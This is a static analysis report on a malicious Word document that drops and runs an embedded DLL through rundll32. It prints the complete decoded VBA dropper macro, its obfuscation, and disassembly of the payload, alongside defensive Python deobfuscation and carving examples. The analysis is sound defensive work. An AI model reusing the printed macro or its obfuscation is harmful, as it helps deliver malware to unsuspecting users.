Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c27c5fad625f35ee…

MALICIOUS

Office (OLE)

986.5 KB Created: 2021-06-24 12:00:00 Authoring application: Microsoft Office Word First seen: 2021-07-02
MD5: 0deee4fd1efd99ea68efac3f235a418d SHA-1: a7d729c92b9a197f8ac1aec329f78965352c6fa3 SHA-256: c27c5fad625f35ee7e02f6464cabc30745308eb4d50eb3136e0ae9ca23efb56c
Risk score: 570

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1218.011 Rundll32 T1027 Obfuscated Files or Information T1566.001 Spearphishing Attachment

The sample contains a VBA project whose Document_Open handler runs as soon as the document is opened with macros enabled. Contrary to what the "download" wording of several heuristics suggests, the macro builds no URL and contacts no server: the payload travels inside the document as an Ole10Native package (display name kiks.dll, original path C:\Users\MyPc\AppData\Local\Temp\kiks.dll, see Extracted artifacts). Document_Open first tests whether <user templates folder>\kikus.dll already exists, which makes the chain run only once. If it does not, sub yyy navigates the document selection (MoveDown/MoveRight/TypeBackspace) and calls Selection.Copy; the macro evidently relies on Packager writing the copied object's file to the user's Temp folder, because bvxfcsd then locates Local\Temp by shortening the templates path until that folder resolves, hdhdd and Search walk it recursively for a file named kiks.dll, and nam renames the hit to kikus.dll inside the templates folder. Finally gc, the macro's alias for ShellExecuteA, runs rundll32 (assembled from the fragments "ru", "n", "dl", "l3" and "2") with the argument <templates>\kikus.dll,LCQHBFEYHXH, i.e. rundll32 loads the dropped DLL and calls its export LCQHBFEYHXH. The embedded PE at offset 0x8EE71 and the package payload are that second stage; the only URL in the document is the DrawingML schema namespace, not a download location.
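To recover the rundll32 command line from the concatenated fragments without executing the macro, the following added example (written for this page, not part of the report's tooling) statically folds VBA string assignments and & concatenations. Its input is a constructed excerpt containing only the string-building statements and the ShellExecuteA call from the carved macro shown under Extracted artifacts; identifiers it cannot resolve (Word object-model calls such as Options.DefaultFilePath, and the vbNullString constant) are left as <placeholders>.

```python
import re

# Constructed sample input: only the string-building statements and the ShellExecuteA
# call from the carved macro (Document_Open in ThisDocument, Module1 and Module3).
MACRO = r'''
bbbb = "ru"
vcbc = Options.DefaultFilePath(cx)
bbbb = bbbb & "n" & "dl"
cvzz = "l3" & "2"
gc 0, vbNullString, _
  bbbb & cvzz, vcbc & "\kikus.dll,LCQHBFEYHXH", _
   vbNullString, 1
oxl = ".dll"
dfbvc = "al" & "\Te"
ewrwsdf = "L" & "o" & "c" & dfbvc & "mp"
'''

ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
SHELLEXEC_ALIAS = 'gc'   # the name the macro's Declare statement gives ShellExecuteA


def join_continuations(text):
    """Fold VBA line continuations (a trailing ' _') into single logical lines."""
    lines, buf = [], ''
    for raw in text.splitlines():
        s = raw.rstrip()
        if s.endswith('_'):
            buf += s[:-1]
            continue
        lines.append(buf + s)
        buf = ''
    return [l for l in lines if l.strip()]


def split_outside_quotes(s, sep):
    """Split s on sep, ignoring occurrences inside double-quoted VBA strings."""
    parts, cur, in_quote = [], '', False
    for ch in s:
        if ch == '"':
            in_quote = not in_quote
        if ch == sep and not in_quote:
            parts.append(cur.strip())
            cur = ''
        else:
            cur += ch
    parts.append(cur.strip())
    return parts


def evaluate(expr, env):
    """Statically fold an expression made of string literals, known variables and '&'.
    Anything else (object-model calls, constants not modelled here) stays as <token>."""
    out = ''
    for tok in split_outside_quotes(expr, '&'):
        if len(tok) >= 2 and tok[0] == '"' and tok[-1] == '"':
            out += tok[1:-1].replace('""', '"')   # VBA escapes a quote by doubling it
        elif tok in env:
            out += env[tok]
        elif tok.isdigit():
            out += tok
        else:
            out += '<%s>' % tok
    return out


def resolve_strings(macro_text):
    """Return (env, calls): the final value of every assigned variable, and the folded
    argument list of every call to the ShellExecuteA alias."""
    env, calls = {}, []
    for line in join_continuations(macro_text):
        m = ASSIGN.match(line)
        if m:
            env[m.group(1)] = evaluate(m.group(2), env)
            continue
        body = line.strip()
        if body.startswith(SHELLEXEC_ALIAS + ' '):
            args = split_outside_quotes(body[len(SHELLEXEC_ALIAS) + 1:], ',')
            calls.append([evaluate(a, env) for a in args])
    return env, calls


if __name__ == '__main__':
    env, calls = resolve_strings(MACRO)
    for name, value in env.items():
        print('%-8s = %s' % (name, value))
    for args in calls:
        # ShellExecuteA(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
        print('ShellExecuteA file=%r params=%r' % (args[2], args[3]))
```

Run stand-alone it prints bbbb = rundl, cvzz = l32, ewrwsdf = Local\Temp and the folded ShellExecuteA call with file rundll32 and parameters <Options.DefaultFilePath(cx)>\kikus.dll,LCQHBFEYHXH, which is the whole point of the fragment obfuscation: no single string in the macro source says rundll32.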

Heuristics 15

  • Office EPRINT stream contains EMF object high CVE-related OLE_EPRINT_EMF_OBJECT
    The OLE ObjectPool contains an EPRINT stream holding EMF data. This is rare in legitimate documents and counts as Office object-delivery evidence when it accompanies exploit-payload anomalies, but this rule alone does not establish the malformed graphics record that attribution to a specific CVE would require.
  • ClamAV: Win.Packed.Johnnie-10034316-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Packed.Johnnie-10034316-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    mov eax, fs:[0x30] loads the PEB; [eax+0x68] is PEB.NtGlobalFlag on x86, and shr eax, 8 followed by test al, 1 tests bit 0x100 (FLG_APPLICATION_VERIFIER). The routine starting at 000BC320 is a second idiom: a call with argument 0, then checks for 'MZ' at the returned base, 'PE\0\0' at e_lfanew and optional-header Magic 0x10b, i.e. validation of a PE32 image base. Both idioms are routinely emitted by the MSVC runtime's own startup code, so on its own this finding says "compiled Windows executable" rather than "shellcode"; its weight here comes from the code having been carved out of an Office document.
    Disassembly
    x86 disassembly · validity: code (0.969) — 11/11 branch targets land on an instruction boundary (100% coherence)
    000BC2ED  64a130000000      mov eax, dword ptr fs:[0x30]
    000BC2F3  8b4068            mov eax, dword ptr [eax + 0x68]
    000BC2F6  c1e808            shr eax, 8
    000BC2F9  a801              test al, 1
    000BC2FB  7510              jne 0xbc30d
    000BC2FD  ff7508            push dword ptr [ebp + 8]
    000BC300  ff1504110401      call dword ptr [0x1041104]
    000BC306  50                push eax
    000BC307  ff1508110401      call dword ptr [0x1041108]
    000BC30D  ff7508            push dword ptr [ebp + 8]
    000BC310  e84e000000        call 0xbc363
    000BC315  59                pop ecx
    000BC316  ff7508            push dword ptr [ebp + 8]
    000BC319  ff1540110401      call dword ptr [0x1041140]
    000BC31F  cc                int3
    000BC320  6a00              push 0
    000BC322  ff15d0100401      call dword ptr [0x10410d0]
    000BC328  85c0              test eax, eax
    000BC32A  7434              je 0xbc360
    000BC32C  b94d5a0000        mov ecx, 0x5a4d
    000BC331  663908            cmp word ptr [eax], cx
    000BC334  752a              jne 0xbc360
    000BC336  8b483c            mov ecx, dword ptr [eax + 0x3c]
    000BC339  03c8              add ecx, eax
    000BC33B  813950450000      cmp dword ptr [ecx], 0x4550
    000BC341  751d              jne 0xbc360
    000BC343  b80b010000        mov eax, 0x10b
    000BC348  66394118          cmp word ptr [ecx + 0x18], ax
    000BC34C  75                .byte 0x75
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    The macro declares ShellExecuteA from shell32 under the alias gc and uses it to launch rundll32; the same API name is among the strings recovered from the carved PE (see Extracted artifacts).
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    LoadLibrary paired with GetProcAddress is the usual way packed code and position-independent payloads resolve imports at run time instead of through the import table.
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    GetProcAddress is listed among the API strings recovered from all three carved binaries (embedded PE, Ole10Native stream, kiks.dll payload).
  • Ole10Native package carries executable/script file type high OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in an executable or script-capable extension. Even without UI extension spoofing, embedding a runnable payload inside an Office document is a high-risk delivery pattern.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject("Scripting.FileSystemObject") gives the macro a FileSystemObject; sub hdhdd hands its GetFolder result to Search, which walks sub-folders recursively looking for a file named kiks.dll, the Ole10Native package's display name.
    Matched line in script
       Set vbvcx = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open runs automatically when the document is opened with macros enabled and is the entry point of the whole chain.
    Matched line in script
    Private Sub Document_Open()
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    VirtualProtect is what an unpacker calls to make decrypted or decompressed code executable; it is among the API strings recovered from all three carved binaries.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    The file contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022. The authoring application here is Word, so confirm which storage in the OLE tree holds the sub-stream (the ObjectPool and the carved objects are the obvious candidates) before weighting this finding; no XLM formula is quoted in this report.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the DrawingML XML namespace URI that Office writes into every drawing part; it is not contacted at run time. Together with the macro source, which builds no URL, it confirms the sample has no download stage.
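The OLE_EMBEDDED_EXE finding ("MZ/PE at offset 0x8EE71") and the image-validation sequence in the SC_PEB_ACCESS disassembly rest on the same header checks. The following added example (not the report's own carver) performs those checks in Python and then sizes the carved file from SizeOfHeaders and the section table, which is how a carver derives the on-disk size of an embedded image. Its input is a constructed, non-runnable PE32 skeleton buried in filler bytes behind a decoy 'MZ' that has no usable e_lfanew; nothing in it comes from the real sample.

```python
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def pe_header_ok(blob, off):
    """The checks the disassembled routine applies to a module base, in the same order:
    'MZ' at +0, e_lfanew read from +0x3C, 'PE\\0\\0' there, optional-header Magic at +0x18.
    The disassembly accepts only 0x10B (PE32); a carver should also accept 0x20B (PE32+)."""
    if blob[off:off + 2] != b'MZ' or off + 0x40 > len(blob):
        return False
    e_lfanew = struct.unpack_from('<I', blob, off + 0x3C)[0]
    nt = off + e_lfanew
    if e_lfanew < 0x40 or e_lfanew > 0x1000 or nt + 0x1A > len(blob):
        return False
    if blob[nt:nt + 4] != b'PE\x00\x00':
        return False
    magic = struct.unpack_from('<H', blob, nt + 0x18)[0]
    return magic in (PE32_MAGIC, PE32PLUS_MAGIC)


def pe_file_size(blob, off):
    """On-disk size of the image at off: the far end of SizeOfHeaders and of every
    section's raw data. Returns None if the headers or section table are truncated."""
    nt = off + struct.unpack_from('<I', blob, off + 0x3C)[0]
    n_sections = struct.unpack_from('<H', blob, nt + 6)[0]   # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from('<H', blob, nt + 20)[0]    # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    opt = nt + 24                                             # IMAGE_OPTIONAL_HEADER starts here
    if opt + 64 > len(blob):
        return None
    end = struct.unpack_from('<I', blob, opt + 60)[0]         # SizeOfHeaders (same offset in PE32/PE32+)
    sections = opt + opt_size
    if sections + 40 * n_sections > len(blob):
        return None
    for i in range(n_sections):
        raw_size, raw_ptr = struct.unpack_from('<II', blob, sections + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return end


def carve_pe(blob):
    """Return (offset, size) for every 'MZ' whose headers validate and whose
    declared extent fits inside blob, i.e. the candidates worth carving out."""
    found, pos = [], 0
    while True:
        pos = blob.find(b'MZ', pos)
        if pos < 0:
            return found
        if pe_header_ok(blob, pos):
            size = pe_file_size(blob, pos)
            if size and pos + size <= len(blob):
                found.append((pos, size))
        pos += 1


def make_min_pe():
    """Constructed, non-runnable PE32 skeleton: DOS header, NT headers, one .text section."""
    dos = bytearray(64)
    dos[0:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 64)                     # e_lfanew
    file_hdr = struct.pack('<HHIIIHH', 0x14C, 1, 0, 0, 0, 224, 0x102)   # i386, 1 section, PE32 opt hdr
    opt = bytearray(224)
    struct.pack_into('<H', opt, 0, PE32_MAGIC)
    struct.pack_into('<I', opt, 60, 512)                      # SizeOfHeaders
    sec = struct.pack('<8sIIIIIIHHI', b'.text', 0x200, 0x1000, 512, 512, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b'PE\x00\x00' + file_hdr + bytes(opt) + sec).ljust(512, b'\x00')
    return headers + b'\xCC' * 512                            # section raw data at file offset 512


# Constructed container: a decoy 'MZ' with e_lfanew 0, filler, the skeleton, trailing bytes.
SAMPLE = b'MZ' + bytes(62) + b'A' * 256 + make_min_pe() + b'\xFF' * 16

if __name__ == '__main__':
    for off, size in carve_pe(SAMPLE):
        print('embedded PE at offset 0x%X, %d bytes' % (off, size))
```

On the constructed input the decoy at offset 0 is rejected at the e_lfanew check and the skeleton at offset 320 is carved with a size of 1024 bytes. Against a real document the same loop would report the artifact the heuristic names, but remember that the size is taken from headers the attacker controls: clamp it to the end of the container, as carve_pe does, and treat an image whose section table points past the file as truncated rather than trusting SizeOfHeaders.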

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2742 bytes
SHA-256: ad427da8430d0bab4b976c0aa215ff17485db4f0e31aee29dd87b9d86837c45d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
  Private Declare PtrSafe Function gc Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
        Dim hdv As String
Private Sub Document_Open()
Dim vcbc As String
Dim bbbb As String
Dim cx
cx = wdUserTemplatesPath
bbbb = "ru"
vcbc = Options.DefaultFilePath(cx)
bbbb = bbbb & "n" & "dl"
If Dir(vcbc & "\kikus.dll") = "" Then
Call yyy

If Len(hdv) > 2 Then

Call nam(hdv)




 Dim cvzz As String
cvzz = "l3" & "2"


  gc 0, vbNullString, _
    bbbb & cvzz, vcbc & "\kikus.dll,LCQHBFEYHXH", _
     vbNullString, 1
End If
End If
End Sub



Sub hdhdd(asda As String)


 Dim vbvcx As Object
   Set vbvcx = CreateObject("Scripting.FileSystemObject")
Call Search(vbvcx.GetFolder(asda), hdv)

End Sub

Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
    Call bvxfcsd
End Sub






Attribute VB_Name = "Module1"
Dim pls As String


Sub nam(pafs As String)
Call ousx
Dim oxl
oxl = ".dll"
Name pafs As pls & "\" & "kikus" & oxl
End Sub


Sub uoia(fffs As String)
pls = fffs
End Sub
 
 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object

  
   For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc
Dim Ters As Object
   For Each Ters In mds.Files
   
   If Ters.Name = "kiks.dll" Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub





Attribute VB_Name = "Module2"

Sub ousx()
Call uoia(Options.DefaultFilePath(wdUserTemplatesPath))
End Sub


Attribute VB_Name = "Module3"
Sub bvxfcsd()

Dim dfbvc As String
dfbvc = "al" & "\Te"

Dim ewrwsdf As String
ewrwsdf = "L" & "o" & "c" & dfbvc & "mp"



    ntgs = 50
sda = 49


While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf)
End Sub
embedded_office_0008ee71.exe embedded-pe Office MZ+PE at offset 0x8EE71 424847 bytes
SHA-256: 9687368aa7bb849f423e939a5ffb415c0f9592495cfe988ca0256f902bdc112b
Detection
ClamAV: Win.Packed.Midie-10008727-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS
Recovered API/import strings: VirtualProtect, GetProcAddress, ExitProcess, ShellExecuteA
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1686015991/Ole10Native 384309 bytes
SHA-256: 4c91f75e7c646f02a4e81780f886c821e4e2f07e1e8a72c19ca473cdc5e34b4c
Detection
ClamAV: Win.Packed.Johnnie-10034316-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS
Recovered API/import strings: VirtualProtect, GetProcAddress, ExitProcess
ole10native_00_kiks.dll ole-package-payload OLE Ole10Native payload: ObjectPool/_1686015991/Ole10Native; display_name=kiks.dll; full_path=C:\Users\MyPc\AppData\Local\Temp\kiks.dll; temp_path=; def_file= 384000 bytes
SHA-256: b8f9cac9fd6145a6c0dcf5dfc3b37d63210d46f24aae5e21cfcfe3ee84766d3f
Detection
ClamAV: Win.Packed.Johnnie-10034316-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS
Recovered API/import strings: VirtualProtect, GetProcAddress, ExitProcess
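The OFFICE_PACKAGE_RISKY_FILE finding and the two ole10native_00 artifact rows above come from the Packager Ole10Native layout (size dword, flags word, display name, original path, a dword Packager writes after the paths, temp path with its length, then the payload with its length). The following added example (not the report's extractor) builds a constructed stream that reuses the display name and original path the report recovered but carries only a 128-byte stand-in payload, parses it back, and applies the risky-extension and MZ checks. The dword after the paths is not interpreted; the builder writes 0x00030000, the value commonly present in Packager-written streams, and the parser skips it.

```python
import struct

# Extensions that Packager launches on double-click; any of these inside a document is a red flag.
RISKY_EXT = {'.exe', '.dll', '.scr', '.com', '.pif', '.cpl', '.bat', '.cmd', '.vbs', '.vbe',
             '.js', '.jse', '.wsf', '.wsh', '.hta', '.ps1', '.msi', '.jar'}


def build_ole10native(label, src_path, payload, temp_path=b''):
    """Serialize a Packager Ole10Native stream (used here only to construct test input)."""
    body = struct.pack('<H', 2)                               # flags word, 2 = embedded file
    body += label + b'\x00' + src_path + b'\x00'
    body += struct.pack('<I', 0x00030000)                     # dword Packager writes after the paths; opaque here
    body += struct.pack('<I', len(temp_path) + 1) + temp_path + b'\x00'
    body += struct.pack('<I', len(payload)) + payload
    return struct.pack('<I', len(body)) + body


def _cstr(buf, pos):
    """Read a NUL-terminated byte string at pos; return (bytes, position after the NUL)."""
    end = buf.index(b'\x00', pos)
    return buf[pos:end], end + 1


def parse_ole10native(stream):
    """Walk the layout: u32 size | u16 flags | label\\0 | source path\\0 | u32 | u32 tmp len |
    tmp path\\0 | u32 data len | data. The size dword counts everything after itself."""
    if len(stream) < 10:
        raise ValueError('stream too short to be Ole10Native')
    declared = struct.unpack_from('<I', stream, 0)[0]
    pos = 6                                                   # past size dword and flags word
    label, pos = _cstr(stream, pos)
    src_path, pos = _cstr(stream, pos)
    pos += 4                                                  # skip the opaque dword
    tmp_len = struct.unpack_from('<I', stream, pos)[0]
    pos += 4
    temp_path = stream[pos:pos + tmp_len].rstrip(b'\x00')
    pos += tmp_len
    data_len = struct.unpack_from('<I', stream, pos)[0]
    pos += 4
    if pos + data_len > len(stream):
        raise ValueError('declared payload length %d runs past end of stream' % data_len)
    return {
        'label': label.decode('latin-1'),
        'src_path': src_path.decode('latin-1'),
        'temp_path': temp_path.decode('latin-1'),
        'data_len': data_len,
        'data': stream[pos:pos + data_len],
        'size_mismatch': declared + 4 != len(stream),
    }


def _ext(path):
    """Extension of the last path component, Windows or POSIX separators."""
    name = path.replace('\\', '/').rsplit('/', 1)[-1]
    return name[name.rfind('.'):].lower() if '.' in name else ''


def risk_reasons(info):
    """Why this package is risky: a runnable extension on any of the three names,
    or a payload that starts with an MZ header regardless of what it is called."""
    reasons = []
    for field in ('label', 'src_path', 'temp_path'):
        ext = _ext(info[field])
        if ext in RISKY_EXT:
            reasons.append('%s ends in %s' % (field, ext))
    if info['data'][:2] == b'MZ':
        reasons.append('payload starts with an MZ header')
    return reasons


# Constructed test input: same display name and original path as the report's artifact row,
# but a 128-byte stand-in payload instead of the real 384000-byte DLL.
SAMPLE_PAYLOAD = b'MZ' + bytes(126)
SAMPLE_STREAM = build_ole10native(b'kiks.dll',
                                  b'C:\\Users\\MyPc\\AppData\\Local\\Temp\\kiks.dll',
                                  SAMPLE_PAYLOAD)

if __name__ == '__main__':
    info = parse_ole10native(SAMPLE_STREAM)
    print('label=%s path=%s payload=%d bytes' % (info['label'], info['src_path'], info['data_len']))
    for reason in risk_reasons(info):
        print('RISK:', reason)
```

Checking the payload's first bytes as well as the names matters because the label is attacker-controlled: a package whose display name is notes.txt but whose payload begins with MZ is still a dropped executable, and the macro in this sample shows why the original path is worth keeping, since the Local\Temp location it records is exactly where the VBA goes looking for kiks.dll.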